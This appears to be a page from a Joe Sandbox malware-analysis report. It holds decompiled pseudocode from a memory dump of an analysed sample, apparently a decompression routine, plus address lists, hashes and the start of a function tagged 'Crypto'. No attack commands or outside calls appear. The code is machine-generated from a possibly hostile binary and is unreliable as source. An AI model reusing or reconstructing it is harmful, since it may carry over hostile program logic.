																			__eflags = _t681 - 2;
																			if(_t681 <= 2) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 3;
																			if(_t681 <= 3) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 4;
																			if(_t681 <= 4) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 5;
																			if(_t681 <= 5) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 6;
																			if(_t681 <= 6) {
																				goto L10;
																			}
																			_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			goto L35;
																		}
																		__eflags = _t544 - _t681;
																		if(_t544 >= _t681) {
																			_t401 = _t681 >> 3;
																			__eflags = _t401;
																			 *(_t725 + 0x34) = _t401;
																			_t687 = _t401;
																			do {
																				E00A50320(_t710, _t521, _t643);
																				_t725 = _t725 + 0xc;
																				_t643 = 8;
																				_t521 = _t521 + _t643;
																				_t710 = _t710 + _t643;
																				_t681 = _t681 - _t643;
																				_t687 = _t687 - 1;
																				__eflags = _t687;
																			} while (_t687 != 0);
																			goto L83;
																		}
																		_t547 = _t681 >> 3;
																		__eflags = _t547;
																		do {
																			_t681 = _t681 - _t643;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t410 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t643;
																			 *((char*)(_t710 + 7)) = _t410;
																			_t710 = _t710 + _t643;
																			_t547 = _t547 - 1;
																			__eflags = _t547;
																		} while (_t547 != 0);
																		goto L84;
																	}
																}
																_t555 = _t520 + (_t378 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t637 -  *_t555;
																	if(_t637 <  *_t555) {
																		break;
																	}
																	_t378 = _t378 + 1;
																	_t555 = _t555 + 4;
																	__eflags = _t378 - 0xf;
																	if(_t378 < 0xf) {
																		continue;
																	}
																	goto L125;
																}
																_t676 = _t378;
																goto L125;
															}
															_t556 = 0x10;
															_t645 = _t637 >> _t556 - _t377;
															_t559 = ( *(_t645 + _t520 + 0x2d7c) & 0x000000ff) + _t699[1];
															 *_t699 =  *_t699 + (_t559 >> 3);
															_t560 = _t559 & 0x00000007;
															 *(_t725 + 0x30) =  *_t699;
															_t699[1] = _t560;
															_t383 =  *(_t520 + 0x317c + _t645 * 2) & 0x0000ffff;
															 *(_t725 + 0x34) = _t560;
															goto L126;
														} else {
															goto L116;
														}
														do {
															L116:
															 *_t534 =  *(_t534 - 4);
															_t534 = _t534 - 4;
															_t635 = _t635 - 1;
															__eflags = _t635;
														} while (_t635 != 0);
														goto L117;
													}
													_t681 =  *(_t686 + 0x74);
													_t705 =  *(_t725 + 0x14);
													_t363 =  *(_t725 + 0x18);
													__eflags = _t681;
												}
												_push(_t725 + 0x38);
												_t439 = E00A43F9D(_t686, _t524);
												__eflags = _t439;
												if(_t439 == 0) {
													goto L145;
												}
												_t441 = E00A4253E(_t686, _t725 + 0x38);
												__eflags = _t441;
												if(_t441 == 0) {
													goto L145;
												}
												goto L35;
											}
											_t682 = _t634 - 0x106;
											__eflags = _t682 - 8;
											if(_t682 >= 8) {
												_t444 = (_t682 >> 2) - 1;
												 *(_t725 + 0x34) = _t444;
												_t681 = ((_t682 & 0x00000003 | 0x00000004) << _t444) + 2;
												__eflags = _t444;
												if(_t444 == 0) {
													L39:
													_t445 =  *(_t725 + 0x10);
													L40:
													_t446 = E00A3A89D(_t445);
													_t447 =  *(_t520 + 0xfa0);
													_t651 = _t446 & 0x0000fffe;
													__eflags = _t651 -  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4));
													if(_t651 >=  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4))) {
														_t711 = 0xf;
														_t448 = _t447 + 1;
														 *(_t725 + 0x28) = _t711;
														__eflags = _t448 - _t711;
														if(_t448 >= _t711) {
															L50:
															_t569 =  *(_t725 + 0x10);
															_t713 = _t569[1] +  *(_t725 + 0x2c);
															_t714 = _t713 & 0x00000007;
															 *_t569 =  *_t569 + (_t713 >> 3);
															 *(_t725 + 0x24) =  *_t569;
															_t452 =  *(_t725 + 0x2c);
															_t569[1] = _t714;
															_t570 = 0x10;
															 *(_t725 + 0x1c) = _t714;
															_t573 =  *((intOrPtr*)(_t520 + 0xf60 + _t452 * 4)) + (_t651 -  *((intOrPtr*)(_t520 + 0xf1c + _t452 * 4)) >> _t570 - _t452);
															__eflags = _t573 -  *((intOrPtr*)(_t520 + 0xf1c));
															asm("sbb eax, eax");
															_t453 = _t452 & _t573;
															__eflags = _t453;
															_t454 =  *(_t520 + 0x1ba4 + _t453 * 2) & 0x0000ffff;
															L51:
															_t654 = _t454 & 0x0000ffff;
															__eflags = _t654 - 4;
															if(_t654 >= 4) {
																_t457 = (_t654 >> 1) - 1;
																 *(_t725 + 0x30) = _t457;
																_t575 = ((_t654 & 0x00000001 | 0x00000002) << _t457) + 1;
																 *(_t725 + 0x34) = _t575;
																_t715 = _t575;
																 *(_t725 + 0x28) = _t715;
																__eflags = _t457;
																if(_t457 == 0) {
																	L70:
																	__eflags = _t715 - 0x100;
																	if(_t715 > 0x100) {
																		_t681 = _t681 + 1;
																		__eflags = _t715 - 0x2000;
																		if(_t715 > 0x2000) {
																			_t681 = _t681 + 1;
																			__eflags = _t715 - 0x40000;
																			if(_t715 > 0x40000) {
																				_t681 = _t681 + 1;
																				__eflags = _t681;
																			}
																		}
																	}
																	 *(_t686 + 0x6c) =  *(_t686 + 0x68);
																	 *(_t686 + 0x68) =  *(_t686 + 0x64);
																	 *(_t686 + 0x64) =  *(_t686 + 0x60);
																	 *(_t686 + 0x60) = _t715;
																	_t658 =  *(_t686 + 0x7c);
																	_t577 = _t658 - _t715;
																	_t462 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	 *(_t686 + 0x74) = _t681;
																	 *(_t725 + 0x34) = _t577;
																	__eflags = _t577 - _t462;
																	if(_t577 >= _t462) {
																		goto L92;
																	} else {
																		__eflags = _t658 - _t462;
																		if(_t658 >= _t462) {
																			goto L92;
																		}
																		_t466 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t710 = _t466 + _t658;
																		_t521 = _t466 + _t577;
																		_t661 = 8;
																		 *(_t686 + 0x7c) = _t658 + _t681;
																		__eflags = _t681 - _t661;
																		if(_t681 < _t661) {
																			goto L84;
																		}
																		__eflags =  *(_t725 + 0x28) - _t681;
																		if( *(_t725 + 0x28) >= _t681) {
																			_t469 = _t681 >> 3;
																			__eflags = _t469;
																			 *(_t725 + 0x34) = _t469;
																			_t689 = _t469;
																			do {
																				E00A50320(_t710, _t521, _t661);
																				_t725 = _t725 + 0xc;
																				_t661 = 8;
																				_t521 = _t521 + _t661;
																				_t710 = _t710 + _t661;
																				_t681 = _t681 - _t661;
																				_t689 = _t689 - 1;
																				__eflags = _t689;
																			} while (_t689 != 0);
																			goto L83;
																		}
																		_t580 = _t681 >> 3;
																		__eflags = _t580;
																		do {
																			_t681 = _t681 - _t661;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t478 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t661;
																			 *((char*)(_t710 + 7)) = _t478;
																			_t710 = _t710 + _t661;
																			_t580 = _t580 - 1;
																			__eflags = _t580;
																		} while (_t580 != 0);
																		goto L84;
																	}
																}
																__eflags = _t457 - 4;
																if(__eflags < 0) {
																	_t479 = E00A48934( *(_t725 + 0x10));
																	_t662 =  *(_t725 + 0x10);
																	_t582 = 0x20;
																	_t585 =  *(_t725 + 0x1c) +  *(_t725 + 0x30);
																	_t715 = (_t479 >> _t582 -  *(_t725 + 0x30)) +  *(_t725 + 0x34);
																	_t586 = _t585 & 0x00000007;
																	__eflags = _t586;
																	 *_t662 = (_t585 >> 3) +  *(_t725 + 0x20);
																	_t662[1] = _t586;
																	L69:
																	 *(_t725 + 0x28) = _t715;
																	goto L70;
																}
																if(__eflags <= 0) {
																	_t483 =  *(_t725 + 0x10);
																} else {
																	_t499 = E00A48934( *(_t725 + 0x10));
																	_t500 =  *(_t725 + 0x30);
																	_t604 = 0x24;
																	_t607 =  *(_t725 + 0x1c) + _t500 + 0xfffffffc;
																	_t715 = (_t499 >> _t604 - _t500 << 4) +  *(_t725 + 0x34);
																	_t669 =  *(_t725 + 0x20) + (_t607 >> 3);
																	_t483 =  *(_t725 + 0x10);
																	_t608 = _t607 & 0x00000007;
																	 *(_t725 + 0x20) = _t669;
																	 *(_t725 + 0x1c) = _t608;
																	 *_t483 = _t669;
																	_t483[1] = _t608;
																}
																_t484 = E00A3A89D(_t483);
																_t485 =  *(_t520 + 0x1e8c);
																_t664 = _t484 & 0x0000fffe;
																__eflags = _t664 -  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4));
																if(_t664 >=  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4))) {
																	_t588 = 0xf;
																	_t486 = _t485 + 1;
																	 *(_t725 + 0x28) = _t588;
																	__eflags = _t486 - _t588;
																	if(_t486 >= _t588) {
																		L66:
																		_t690 =  *(_t725 + 0x10);
																		_t590 = ( *(_t725 + 0x10))[1] +  *(_t725 + 0x2c);
																		 *_t690 =  *_t690 + (_t590 >> 3);
																		_t690[1] = _t590 & 0x00000007;
																		_t491 =  *(_t725 + 0x2c);
																		_t592 = 0x10;
																		_t595 =  *((intOrPtr*)(_t520 + 0x1e4c + _t491 * 4)) + (_t664 -  *((intOrPtr*)(_t520 + 0x1e08 + _t491 * 4)) >> _t592 - _t491);
																		__eflags = _t595 -  *((intOrPtr*)(_t520 + 0x1e08));
																		asm("sbb eax, eax");
																		_t492 = _t491 & _t595;
																		__eflags = _t492;
																		_t493 =  *(_t520 + 0x2a90 + _t492 * 2) & 0x0000ffff;
																		goto L67;
																	}
																	_t597 = _t520 + (_t486 + 0x783) * 4;
																	while(1) {
																		__eflags = _t664 -  *_t597;
																		if(_t664 <  *_t597) {
																			break;
																		}
																		_t486 = _t486 + 1;
																		_t597 = _t597 + 4;
																		__eflags = _t486 - 0xf;
																		if(_t486 < 0xf) {
																			continue;
																		}
																		goto L66;
																	}
																	 *(_t725 + 0x28) = _t486;
																	goto L66;
																} else {
																	_t691 =  *(_t725 + 0x10);
																	_t598 = 0x10;
																	_t667 = _t664 >> _t598 - _t485;
																	_t601 = ( *(_t667 + _t520 + 0x1e90) & 0x000000ff) +  *(_t725 + 0x1c);
																	 *_t691 = (_t601 >> 3) +  *(_t725 + 0x20);
																	_t691[1] = _t601 & 0x00000007;
																	_t493 =  *(_t520 + 0x2290 + _t667 * 2) & 0x0000ffff;
																	L67:
																	_t686 =  *(_t725 + 0x24);
																	_t715 = _t715 + (_t493 & 0x0000ffff);
																	goto L69;
																}
															}
															_t715 = _t654 + 1;
															goto L69;
														}
														_t610 = _t520 + (_t448 + 0x3c8) * 4;
														while(1) {
															__eflags = _t651 -  *_t610;
															if(_t651 <  *_t610) {
																break;
															}
															_t448 = _t448 + 1;
															_t610 = _t610 + 4;
															__eflags = _t448 - _t711;
															if(_t448 < _t711) {
																continue;
															}
															goto L50;
														}
														 *(_t725 + 0x28) = _t448;
														goto L50;
													}
													_t611 = 0x10;
													_t670 = _t651 >> _t611 - _t447;
													_t614 = ( *(_t670 + _t520 + 0xfa4) & 0x000000ff) + _t697;
													_t723 =  *(_t725 + 0x1c) + (_t614 >> 3);
													_t506 =  *(_t725 + 0x10);
													_t615 = _t614 & 0x00000007;
													 *(_t725 + 0x20) = _t723;
													 *(_t725 + 0x1c) = _t615;
													 *_t506 = _t723;
													_t506[1] = _t615;
													_t454 =  *(_t520 + 0x13a4 + _t670 * 2) & 0x0000ffff;
													goto L51;
												}
												_t507 = E00A3A89D( *(_t725 + 0x10));
												_t724 = _t697 +  *(_t725 + 0x34);
												_t617 = 0x10;
												_t681 = _t681 + (_t507 >> _t617 -  *(_t725 + 0x34));
												_t620 =  *(_t725 + 0x1c) + (_t724 >> 3);
												_t445 =  *(_t725 + 0x10);
												_t697 = _t724 & 0x00000007;
												 *(_t725 + 0x1c) = _t620;
												 *_t445 = _t620;
												_t445[1] = _t697;
												goto L40;
											}
											 *(_t725 + 0x1c) = _t375;
											_t681 = _t682 + 2;
											__eflags = _t681;
											goto L39;
										}
										 *( *((intOrPtr*)(_t686 + 0x4b40)) +  *(_t686 + 0x7c)) = _t634;
										_t72 = _t686 + 0x7c;
										 *_t72 =  *(_t686 + 0x7c) + 1;
										__eflags =  *_t72;
										goto L35;
									}
									_t623 = _t520 + (_t369 + 0xd) * 4;
									while(1) {
										__eflags = _t630 -  *_t623;
										if(_t630 <  *_t623) {
											break;
										}
										_t369 = _t369 + 1;
										_t623 = _t623 + 4;
										__eflags = _t369 - 0xf;
										if(_t369 < 0xf) {
											continue;
										}
										_t528 =  *(_t725 + 0x28);
										goto L32;
									}
									_t528 = _t369;
									 *(_t725 + 0x28) = _t369;
									goto L32;
								}
								_t624 = 0x10;
								_t671 = _t630 >> _t624 - _t368;
								_t524 = _t674;
								_t707 = ( *(_t671 + _t520 + 0xb8) & 0x000000ff) + _t524[1];
								 *_t524 =  *_t524 + (_t707 >> 3);
								_t697 = _t707 & 0x00000007;
								_t375 =  *_t524;
								_t524[1] = _t697;
								_t633 =  *(_t520 + 0x4b8 + _t671 * 2) & 0x0000ffff;
								 *(_t725 + 0x1c) = _t375;
								goto L33;
							}
							__eflags = _t526 - _t628;
							if(_t526 == _t628) {
								goto L24;
							}
							E00A45202(_t686);
							__eflags =  *((intOrPtr*)(_t686 + 0x4c5c)) -  *((intOrPtr*)(_t686 + 0x4c4c));
							if(__eflags > 0) {
								L6:
								return 0;
							}
							if(__eflags < 0) {
								goto L24;
							}
							__eflags =  *((intOrPtr*)(_t686 + 0x4c58)) -  *((intOrPtr*)(_t686 + 0x4c48));
							if( *((intOrPtr*)(_t686 + 0x4c58)) >  *((intOrPtr*)(_t686 + 0x4c48))) {
								goto L6;
							}
							goto L24;
						}
					}
					L5:
					 *((char*)(_t520 + 0x4ad0)) = 1;
					goto L6;
				}
				 *((char*)(_t520 + 0x2c)) = 1;
				_push(_t520 + 0x30);
				_push(_t672);
				_push(_t692);
				if(E00A443BF(__ecx) == 0) {
					goto L5;
				} else {
					goto L4;
				}
			}

0x00a477f3
0x00a477f9
0x00a477ff
0x00a47803
0x00a47807
0x00a4780a
0x00a4780e
0x00a47825
0x00a47829
0x00a4782c
0x00a47833
0x00a4784d
0x00a4784f
0x00a47852
0x00a47856
0x00a4785a
0x00a4785e
0x00a47860
0x00a47862
0x00a47862
0x00a47866
0x00a47874
0x00a47877
0x00a4787d
0x00a4787f
0x00a47882
0x00a47884
0x00a47888
0x00000000
0x00000000
0x00a4788a
0x00a4788a
0x00a4788c
0x00a481e3
0x00000000
0x00a481e3
0x00a47892
0x00a478a0
0x00a478a0
0x00a478a2
0x00a478b1
0x00a478b1
0x00a478b7
0x00a481dc
0x00a481dc
0x00000000
0x00a481dc
0x00000000
0x00a478b7
0x00a478a4
0x00a478ab
0x00000000
0x00000000
0x00000000
0x00a478ab
0x00a47897
0x00a4789a
0x00000000
0x00000000
0x00000000
0x00a478bd
0x00a478bd
0x00a478c9
0x00a478ce
0x00a47901
0x00a47901
0x00a47907
0x00a4790e
0x00a47914
0x00a4791a
0x00a4791e
0x00a47953
0x00a47954
0x00a47955
0x00a47959
0x00a4795b
0x00a4797c
0x00a4797f
0x00a47983
0x00a47989
0x00a4798d
0x00a47991
0x00a47995
0x00a4799a
0x00a479a7
0x00a479a9
0x00a479ac
0x00a479ae
0x00a479ae
0x00a479b0
0x00a479b4
0x00a479bc
0x00a479c0
0x00a479c0
0x00a479c8
0x00a479ca
0x00a479e8
0x00a479ee
0x00a47e80
0x00a47e82
0x00a47eb2
0x00a47eb8
0x00a47fb2
0x00a47fb2
0x00a47fbb
0x00a47fbe
0x00a47fc0
0x00a47fc4
0x00a47fd3
0x00a47fd3
0x00a47fd6
0x00a47fdc
0x00a47fe3
0x00a47fe9
0x00a47fef
0x00a47ff6
0x00a4802f
0x00a48030
0x00a48031
0x00a48033
0x00a4804f
0x00a48052
0x00a48056
0x00a48059
0x00a4805f
0x00a48069
0x00a4806c
0x00a48072
0x00a48075
0x00a48082
0x00a48084
0x00a4808a
0x00a4808c
0x00a4808c
0x00a4808e
0x00a48096
0x00a48096
0x00a48099
0x00a4809c
0x00a480ae
0x00a480b3
0x00a480b6
0x00a480b8
0x00a480be
0x00a480c3
0x00a480c9
0x00a480d2
0x00a480d4
0x00a480df
0x00a480df
0x00a480e2
0x00a480e4
0x00a480e4
0x00a4809e
0x00a4809e
0x00a4809e
0x00a480e7
0x00a480f2
0x00a480f6
0x00a480fb
0x00a480fd
0x00a48100
0x00a48102
0x00a4819e
0x00a4819e
0x00a481a2
0x00a481a6
0x00a481a8
0x00000000
0x00000000
0x00a481ae
0x00a481b4
0x00a481ba
0x00a481bc
0x00a481c0
0x00a481c6
0x00a481cd
0x00a481cf
0x00a481d2
0x00a481d2
0x00a481d2
0x00000000
0x00a48108
0x00a48108
0x00a4810a
0x00000000
0x00000000
0x00a48110
0x00a48118
0x00a4811b
0x00a48121
0x00a48122
0x00a48125
0x00a48127
0x00a47daa
0x00a47daa
0x00a47dae
0x00a47db2
0x00a47db4
0x00a4786c
0x00a4786c
0x00a47870
0x00a47870
0x00a47870
0x00a47874
0x00a47874
0x00a47877
0x00a4787d
0x00a4787f
0x00a47882
0x00a47884
0x00a47888
0x00000000
0x00000000
0x00000000
0x00a47888
0x00a47ed1
0x00a47edc
0x00a47edf
0x00a47ee4
0x00a47ee6
0x00a47ee8
0x00a47f84
0x00a47f84
0x00a47f8a
0x00a47f90
0x00a47f92
0x00a47f96
0x00a47f9c
0x00a47fa3
0x00a47fa5
0x00a47fa8
0x00a47fa8
0x00a47fa8
0x00a479db
0x00a479db
0x00a479df
0x00000000
0x00a479df
0x00a47eee
0x00a47ef0
0x00000000
0x00000000
0x00a47ef6
0x00a47efe
0x00a47f01
0x00a47f07
0x00a47f08
0x00a47f0b
0x00a47f0d
0x00000000
0x00000000
0x00a47f13
0x00a47f15
0x00a47f5d
0x00a47f5d
0x00a47f60
0x00a47f64
0x00a47f66
0x00a47f69
0x00a47f6e
0x00a47f73
0x00a47f74
0x00a47f76
0x00a47f78
0x00a47f7a
0x00a47f7a
0x00a47f7a
0x00a47da6
0x00a47da6
0x00000000
0x00a47da6
0x00a47f19
0x00a47f19
0x00a47f1c
0x00a47f1e
0x00a47f20
0x00a47f26
0x00a47f2c
0x00a47f32
0x00a47f38
0x00a47f3e
0x00a47f44
0x00a47f47
0x00a47f4a
0x00a47f4c
0x00a47f4f
0x00a47f51
0x00a47f51
0x00a47f51
0x00000000
0x00a47e3a
0x00a47e3a
0x00a47e3e
0x00a47e42
0x00a47e46
0x00a47e46
0x00a47e4e
0x00a47e54
0x00a47e58
0x00a47e5e
0x00a47e60
0x00a47e64
0x00a47e6a
0x00a47e71
0x00a47e73
0x00a47e76
0x00a47e76
0x00a47e76
0x00000000
0x00a47e7b
0x00a47dbc
0x00a47dbf
0x00a47dc3
0x00a47dc6
0x00000000
0x00000000
0x00a47dcf
0x00a47dd2
0x00a47dd6
0x00a47dd9
0x00000000
0x00000000
0x00a47de2
0x00a47de5
0x00a47de9
0x00a47dec
0x00000000
0x00000000
0x00a47df5
0x00a47df8
0x00a47dfc
0x00a47dff
0x00000000
0x00000000
0x00a47e08
0x00a47e0b
0x00a47e0f
0x00a47e12
0x00000000
0x00000000
0x00a47e1b
0x00a47e1e
0x00a47e22
0x00a47e25
0x00000000
0x00000000
0x00a47e2e
0x00a47e32
0x00000000
0x00a47e32
0x00a4812d
0x00a4812f
0x00a48177
0x00a48177
0x00a4817a
0x00a4817e
0x00a48180
0x00a48183
0x00a48188
0x00a4818d
0x00a4818e
0x00a48190
0x00a48192
0x00a48194
0x00a48194
0x00a48194
0x00000000
0x00a48199
0x00a48133
0x00a48133
0x00a48136
0x00a48138
0x00a4813a
0x00a48140
0x00a48146
0x00a4814c
0x00a48152
0x00a48158
0x00a4815e
0x00a48161
0x00a48164
0x00a48166
0x00a48169
0x00a4816b
0x00a4816b
0x00a4816b
0x00000000
0x00a48170
0x00a48102
0x00a4803b
0x00a4803e
0x00a4803e
0x00a48040
0x00000000
0x00000000
0x00a48042
0x00a48043
0x00a48046
0x00a48049
0x00000000
0x00000000
0x00000000
0x00a4804b
0x00a4804d
0x00000000
0x00a4804d
0x00a47ffa
0x00a47ffd
0x00a48007
0x00a4800f
0x00a48012
0x00a48018
0x00a4801c
0x00a4801f
0x00a48027
0x00000000
0x00000000
0x00000000
0x00000000
0x00a47fc6
0x00a47fc6
0x00a47fc9
0x00a47fcb
0x00a47fce
0x00a47fce
0x00a47fce
0x00000000
0x00a47fc6
0x00a47ebe
0x00a47ec1
0x00a47ec5
0x00a47ec9
0x00a47ec9
0x00a47e88
0x00a47e8c
0x00a47e91
0x00a47e93
0x00000000
0x00000000
0x00a47ea0
0x00a47ea5
0x00a47ea7
0x00000000
0x00000000
0x00000000
0x00a47ead
0x00a479f4
0x00a479fa
0x00a479fd
0x00a47a74
0x00a47a77
0x00a47a7d
0x00a47a80
0x00a47a82
0x00a47a06
0x00a47a06
0x00a47a0a
0x00a47a0c
0x00a47a13
0x00a47a19
0x00a47a1f
0x00a47a26
0x00a47abe
0x00a47abf
0x00a47ac0
0x00a47ac4
0x00a47ac6
0x00a47ae3
0x00a47ae3
0x00a47aec
0x00a47af2
0x00a47af8
0x00a47afc
0x00a47b00
0x00a47b04
0x00a47b07
0x00a47b0a
0x00a47b1e
0x00a47b20
0x00a47b26
0x00a47b28
0x00a47b28
0x00a47b2a
0x00a47b32
0x00a47b32
0x00a47b35
0x00a47b38
0x00a47b4c
0x00a47b4f
0x00a47b55
0x00a47b58
0x00a47b5c
0x00a47b5e
0x00a47b62
0x00a47b64
0x00a47cc9
0x00a47cc9
0x00a47ccf
0x00a47cd1
0x00a47cd2
0x00a47cd8
0x00a47cda
0x00a47cdb
0x00a47ce1
0x00a47ce3
0x00a47ce3
0x00a47ce3
0x00a47ce1
0x00a47cd8
0x00a47ce7
0x00a47ced
0x00a47cf3
0x00a47cf6
0x00a47cf9
0x00a47d04
0x00a47d06
0x00a47d0b
0x00a47d0e
0x00a47d12
0x00a47d14
0x00000000
0x00a47d1a
0x00a47d1a
0x00a47d1c
0x00000000
0x00000000
0x00a47d22
0x00a47d2a
0x00a47d2d
0x00a47d33
0x00a47d34
0x00a47d37
0x00a47d39
0x00000000
0x00000000
0x00a47d3b
0x00a47d3f
0x00a47d84
0x00a47d84
0x00a47d87
0x00a47d8b
0x00a47d8d
0x00a47d90
0x00a47d95
0x00a47d9a
0x00a47d9b
0x00a47d9d
0x00a47d9f
0x00a47da1
0x00a47da1
0x00a47da1
0x00000000
0x00a47d8d
0x00a47d43
0x00a47d43
0x00a47d46
0x00a47d48
0x00a47d4a
0x00a47d50
0x00a47d56
0x00a47d5c
0x00a47d62
0x00a47d68
0x00a47d6e
0x00a47d71
0x00a47d74
0x00a47d76
0x00a47d79
0x00a47d7b
0x00a47d7b
0x00a47d7b
0x00000000
0x00a47d80
0x00a47d14
0x00a47b6a
0x00a47b6d
0x00a47c94
0x00a47c99
0x00a47ca1
0x00a47cac
0x00a47cb0
0x00a47cbd
0x00a47cbd
0x00a47cc0
0x00a47cc2
0x00a47cc5
0x00a47cc5
0x00000000
0x00a47cc5
0x00a47b73
0x00a47bbc
0x00a47b75
0x00a47b79
0x00a47b84
0x00a47b8a
0x00a47b96
0x00a47b9b
0x00a47ba4
0x00a47ba6
0x00a47baa
0x00a47bad
0x00a47bb1
0x00a47bb5
0x00a47bb7
0x00a47bb7
0x00a47bc2
0x00a47bc9
0x00a47bcf
0x00a47bd5
0x00a47bdc
0x00a47c14
0x00a47c15
0x00a47c16
0x00a47c1a
0x00a47c1c
0x00a47c3a
0x00a47c3e
0x00a47c47
0x00a47c53
0x00a47c57
0x00a47c5a
0x00a47c5e
0x00a47c71
0x00a47c73
0x00a47c79
0x00a47c7b
0x00a47c7b
0x00a47c7d
0x00000000
0x00a47c7d
0x00a47c24
0x00a47c27
0x00a47c27
0x00a47c29
0x00000000
0x00000000
0x00a47c2b
0x00a47c2c
0x00a47c2f
0x00a47c32
0x00000000
0x00000000
0x00000000
0x00a47c34
0x00a47c36
0x00000000
0x00a47bde
0x00a47bde
0x00a47be4
0x00a47be7
0x00a47bf1
0x00a47c01
0x00a47c05
0x00a47c08
0x00a47c85
0x00a47c85
0x00a47c8c
0x00000000
0x00a47c8c
0x00a47bdc
0x00a47b3a
0x00000000
0x00a47b3a
0x00a47ace
0x00a47ad1
0x00a47ad1
0x00a47ad3
0x00000000
0x00000000
0x00a47ad5
0x00a47ad6
0x00a47ad9
0x00a47adb
0x00000000
0x00000000
0x00000000
0x00a47add
0x00a47adf
0x00000000
0x00a47adf
0x00a47a2e
0x00a47a31
0x00a47a3b
0x00a47a46
0x00a47a48
0x00a47a4c
0x00a47a4f
0x00a47a53
0x00a47a57
0x00a47a59
0x00a47a5c
0x00000000
0x00a47a5c
0x00a47a88
0x00a47a8d
0x00a47a93
0x00a47a9e
0x00a47aa5
0x00a47aa7
0x00a47aab
0x00a47aae
0x00a47ab2
0x00a47ab4
0x00000000
0x00a47ab4
0x00a479ff
0x00a47a03
0x00a47a03
0x00000000
0x00a47a03
0x00a479d5
0x00a479d8
0x00a479d8
0x00a479d8
0x00000000
0x00a479d8
0x00a47960
0x00a47963
0x00a47963
0x00a47965
0x00000000
0x00000000
0x00a47967
0x00a47968
0x00a4796b
0x00a4796e
0x00000000
0x00000000
0x00a47970
0x00000000
0x00a47970
0x00a47976
0x00a47978
0x00000000
0x00a47978
0x00a47922
0x00a47925
0x00a47927
0x00a47931
0x00a47939
0x00a4793b
0x00a4793e
0x00a47940
0x00a47943
0x00a4794b
0x00000000
0x00a4794b
0x00a478d0
0x00a478d2
0x00000000
0x00000000
0x00a478d6
0x00a478e1
0x00a478e7
0x00a4783c
0x00000000
0x00a4783c
0x00a478ed
0x00000000
0x00000000
0x00a478f5
0x00a478fb
0x00000000
0x00000000
0x00000000
0x00a478fb
0x00a47874
0x00a47835
0x00a47835
0x00000000
0x00a47835
0x00a47813
0x00a47817
0x00a47818
0x00a47819
0x00a47821
0x00000000
0x00a47823
0x00000000
0x00a47823

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: c618b82217322043e61af9cb0d1500a376080f9f8bb9f2a5a5085da431e341cf
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction Fuzzy Hash: 7A62D5756083858FCB15CF28C980ABDBBE1BFD5304F18896DE89A8B346D730E945CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F461 Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00A3F461(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t434;
				intOrPtr _t436;
				intOrPtr _t441;
				void* _t446;
				intOrPtr _t448;
				signed int _t451;
				void* _t453;
				signed int _t459;
				signed int _t465;
				signed int _t471;
				signed int _t478;
				signed int _t481;
				signed int _t488;
				signed int _t511;
				signed int _t518;
				signed int _t525;
				signed int _t545;
